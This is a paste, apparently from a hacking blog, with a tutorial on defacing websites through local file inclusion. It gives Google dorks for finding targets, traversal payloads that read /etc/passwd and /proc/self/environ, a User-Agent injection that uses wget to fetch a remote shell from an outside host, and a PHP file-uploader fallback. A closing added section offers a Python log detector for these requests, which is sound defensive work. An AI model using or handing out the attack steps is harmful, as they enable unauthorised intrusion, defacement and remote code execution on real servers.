Untitled

a guest
Apr 26th, 2019
LFI Tutorial – How to Deface a Website with the Local File Inclusion Technique. This is actually a really old exploit. You could even call it a basic if you want to learn web pentesting, on par with SQLi. But I'm posting it anyway so the blog's content is complete, and as a personal archive too, hehe.
Let's get straight to it: all you need here is the Mozilla browser with the Tamper Data add-on.

Google Dorks:

inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
Use your brain, b1tch!
I'll assume you have already found a vulnerable site.
First, do a basic test of whether the site is vulnerable to LFI.

localhost/view.php?page=email.php
Try replacing email.php with ../../

localhost/view.php?page=../../
If you get an error like

Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
Voilà! 😀 There is a chance to open more sensitive local files 😀
Let's try calling the /etc/passwd file.

localhost/view.php?page=etc/passwd
Still an error?

Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
Let's try going up the directory tree.

localhost/view.php?page=../../../../../etc/passwd
If it still errors, keep going up directories until the /etc/passwd file can be read.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
… etc. :p

Now let's check whether proc/self/environ can be accessed or not, because this is where the backdoor injection process starts.

localhost/view.php?page=../../../../../proc/self/environ
DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
SERVER_ADDR=1xx.1xx.1xx.6x [email protected] SERVER_NAME=localhost
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80
That means the site can be injected. If the page is blank, it cannot.
Next step, enable Tamper Data.
Load the page localhost/view.php?page=../../../../../proc/self/environ
Then tamper.
In the User-Agent field of the Tamper Data add-on, enter

<?system(‘wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php’);?>
Then submit.

Your shell will be located at

localhost/fvck.php
In some cases the system function is disabled on the server, so we cannot run wget using the method above.
But there is another way.
In the User-Agent, enter the following uploader script:

<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>
<h1> shu </h1></p>
<br> <form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>
Once uploaded, the shell will be located in the domain's root path.
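
From the defender's side, every request in this walkthrough leaves a distinctive trace in the web server's access log. The following is an added example, not part of the original paste: a Python check that flags the directory traversal sequences, the /etc/passwd and /proc/self/environ targets, and a PHP open tag in the User-Agent. The log lines, the IP address and the indicator names are constructed for illustration and assume the Apache/nginx combined log format.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" format; quoted fields may contain \" escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ ' + QUOTED + " " + QUOTED + "$"
)
SENSITIVE = ("/etc/passwd", "/proc/self/environ")  # files named in the write-up
DOT_DOT = re.compile(r"(^|/)\.\.(/|$)")  # ".." as a whole path segment


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (..%252F) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return the sorted LFI indicators present in one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _ip, uri, _referer, user_agent = m.groups()
    hits = set()
    for _name, raw in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        # Normalise separators and anchor with "/" so "etc/passwd" also matches.
        value = "/" + fully_decode(raw).replace("\\", "/").lstrip("/")
        if DOT_DOT.search(value):
            hits.add("traversal")
        if any(path in value for path in SENSITIVE):
            hits.add("sensitive_file")
    if "<?" in user_agent:  # a PHP open tag has no place in a User-Agent header
        hits.add("php_in_user_agent")
    return sorted(hits)


# Constructed sample lines (not from a real server); 203.0.113.7 is a documentation address.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Apr/2019:10:00:01 +0000] "GET /view.php?page=email.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [26/Apr/2019:10:00:05 +0000] "GET /view.php?page=../../ HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [26/Apr/2019:10:00:09 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1290 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [26/Apr/2019:10:00:14 +0000] "GET /view.php?page=../../../../../proc/self/environ HTTP/1.1" 200 900 "-" "<?system(...);?>"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry) or "clean", "<-", entry.split('"')[1])
```

A hit on php_in_user_agent together with a /proc/self/environ request is the combination to alert on, since it corresponds to the injection step rather than the earlier probing.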